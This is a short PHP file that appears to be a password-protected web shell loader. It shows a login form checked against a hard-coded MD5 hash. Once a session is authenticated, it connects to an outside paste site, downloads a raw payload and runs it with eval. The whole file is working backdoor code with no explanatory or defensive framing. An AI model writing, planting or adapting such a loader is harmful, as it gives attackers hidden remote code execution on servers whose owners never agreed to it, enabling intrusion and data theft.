<?php

session_start();
if (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true) {
    $host = 'paste.phyo186.cfd';
    $port = 443;
    $path = '/KNI4e-V2AuDa/raw';
    
    $fp = stream_socket_client("ssl://$host:$port", $errno, $errstr, 30);
    if (!$fp) {
        echo "Error: $errstr ($errno)<br />\n";
    } else {
        $out = "GET $path HTTP/1.1\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
    
        $content = '';
        while (!feof($fp)) {
            $content .= fgets($fp, 128);
        }
        fclose($fp);
    
        $header_end = strpos($content, "\r\n\r\n");
        if ($header_end !== false) {
            $content = substr($content, $header_end + 4);
        }
    
        eval("?>" .$content);
    }
} else {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $password = $_POST['password'] ?? '';

        if (md5($password) === "70943e2ff785723cc5d6631d6f475356") {
            $_SESSION['logged_in'] = true;
            header("Location: " . $_SERVER['PHP_SELF']);
            exit;
        }
    }

    ?>
    <form method="post">
        <input type="password" name="password"><br><br>
        <button type="submit">Login</button>
    </form>

    <?php
}
?>
